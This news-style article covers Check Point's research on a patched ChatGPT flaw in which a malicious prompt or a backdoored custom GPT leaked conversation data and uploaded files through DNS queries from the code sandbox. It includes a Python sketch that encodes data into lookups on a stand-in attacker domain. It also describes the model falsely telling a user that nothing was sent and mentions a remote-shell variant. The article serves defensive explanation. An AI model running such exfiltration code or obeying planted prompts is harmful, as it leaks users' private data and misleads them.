A single malicious prompt could silently steal ChatGPT conversation data — including uploaded files, user messages, and AI-generated summaries — through a DNS side channel in the platform’s code execution runtime, according to research published by Check Point on March 30. OpenAI patched the vulnerability on February 20, 2026, following responsible disclosure.
The flaw is distinct from the Codex command injection vulnerability disclosed separately by BeyondTrust’s Phantom Labs, which exposed GitHub OAuth tokens through branch name manipulation. That bug was also patched. The two vulnerabilities were reported together by The Hacker News on March 30, but they target different attack surfaces: Codex’s CI/CD pipeline versus ChatGPT’s sandboxed code execution environment.
How the Attack Worked
ChatGPT’s code execution and data analysis feature runs inside a sandboxed Linux container. OpenAI states that this environment “is unable to generate outbound network requests directly.” Direct HTTP calls are blocked. Legitimate outbound data sharing through custom GPT Actions requires explicit user approval with a dialog showing the destination and data being sent.
The Check Point researchers found a gap: DNS resolution remained unrestricted inside the container. DNS queries, typically treated as harmless infrastructure for resolving domain names, can encode arbitrary data in the subdomain portion of a lookup. By crafting a prompt that triggered Python code execution inside the sandbox, an attacker could encode sensitive conversation content into DNS queries for subdomains of an attacker-controlled domain; each lookup is forwarded to that domain's authoritative nameserver, which the attacker operates and can use to log and reassemble the encoded data, according to The Register.
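The encoding side of such a channel is simple to sketch. The following is a minimal illustration of the general DNS-exfiltration technique, not Check Point's actual proof-of-concept code; the domain `exfil.example.com` and all function names are hypothetical:

```python
import socket

# Hypothetical attacker-controlled domain whose authoritative
# nameserver logs every query it receives.
ATTACKER_DOMAIN = "exfil.example.com"

def encode_chunks(data: bytes, label_len: int = 60):
    """Hex-encode data and split it into chunks that fit a DNS label (max 63 chars)."""
    hexed = data.hex()
    return [hexed[i:i + label_len] for i in range(0, len(hexed), label_len)]

def build_queries(data: bytes, domain: str = ATTACKER_DOMAIN):
    """Build one fully qualified name per chunk.

    A leading sequence number lets the receiving nameserver reorder
    chunks. Real tooling would also respect the 253-character limit
    on total name length.
    """
    return [f"{seq}.{chunk}.{domain}"
            for seq, chunk in enumerate(encode_chunks(data))]

def exfiltrate(data: bytes):
    """Leak data by resolving one crafted name per chunk."""
    for name in build_queries(data):
        try:
            # The lookup fails inside the sandbox (no such record),
            # but the query itself still travels out to the
            # attacker's authoritative nameserver.
            socket.gethostbyname(name)
        except socket.gaierror:
            pass

# Example: 29 bytes of sensitive text become a single crafted lookup.
queries = build_queries(b"patient: Jane Doe, HbA1c 9.1%")
```

Because the payload rides in the query name itself, no answer ever needs to come back: the data has left the moment the resolver forwards the question.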
Because the AI model itself assumed the code execution environment was fully isolated, it did not flag the DNS activity as an external data transfer. No approval dialogs appeared. No warnings fired. The user saw a normal ChatGPT response while their data left the system through the DNS channel, per Check Point’s technical writeup.
Three Proof-of-Concept Attacks
Check Point demonstrated three exploitation scenarios. In one, a backdoored custom GPT posing as a health analyst ingested a user’s uploaded PDF containing lab results and personal information. When asked whether it had transmitted the data externally, ChatGPT “answered confidently that it had not, explaining that the file was only stored in a secure internal location,” The Register reported. The data had already been exfiltrated.
The researchers also showed the same hidden communication path could establish remote shell access inside the Linux runtime, enabling direct command execution, per the Check Point research paper.
The Pattern for Agent Builders
This is the second distinct OpenAI security disclosure in the past 48 hours. The Codex token exposure targeted developer tooling. Now the ChatGPT DNS exfiltration targets the platform’s core code execution infrastructure.
For teams building on top of AI platforms, the lesson from Check Point’s head of research Eli Smadja is direct: “Don’t assume AI tools are secure by default,” he wrote in Check Point’s blog summary. “Just as organizations learned not to blindly trust cloud providers, the same logic now applies to AI vendors.”
The DNS vector in particular matters for any AI system that runs code in a sandboxed environment. If the sandbox blocks HTTP but leaves DNS open, it has a data exfiltration channel. That applies to ChatGPT, to Codex, and to any agent framework that executes user-triggered code inside containers with network restrictions.
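One quick way to check for that gap from inside a sandbox is to probe both egress paths directly. This is a minimal audit sketch under stated assumptions: the probe host and result structure are illustrative, and a real audit would test against a domain you control so that query arrival can be confirmed server-side:

```python
import socket
import urllib.request

def probe_egress(host: str = "example.com", timeout: float = 3.0) -> dict:
    """Probe two egress paths from inside a sandbox.

    Returns {"http": bool, "dns": bool}. A result of
    {"http": False, "dns": True} is the dangerous configuration:
    direct requests are blocked, but name resolution still reaches
    the outside world and can carry data in query names.
    """
    result = {"http": False, "dns": False}
    try:
        urllib.request.urlopen(f"http://{host}/", timeout=timeout)
        result["http"] = True
    except OSError:
        pass  # blocked, unreachable, or timed out
    try:
        socket.getaddrinfo(host, None)
        result["dns"] = True
    except OSError:
        pass  # resolution blocked or no resolver configured
    return result
```

In a fully isolated environment both probes should fail; any split result means the "network isolation" is only partial.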
OpenAI fixed this specific flaw. But the underlying architectural assumption — that blocking HTTP constitutes network isolation — is shared across much of the AI agent infrastructure being built right now. Teams deploying agents that handle sensitive data in sandboxed code execution environments should audit their DNS policies.